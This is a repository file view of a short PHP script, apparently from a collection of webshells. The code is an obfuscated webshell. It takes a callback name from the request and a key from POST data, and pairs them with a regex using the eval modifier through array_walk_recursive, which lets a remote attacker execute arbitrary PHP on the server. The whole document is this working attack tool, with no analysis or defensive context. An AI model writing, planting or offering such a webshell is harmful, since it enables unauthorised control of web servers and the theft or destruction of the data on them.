webshell/php/2020.08.20.16.php

6 lines
120 B
PHP
Raw Permalink Normal View History

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
?>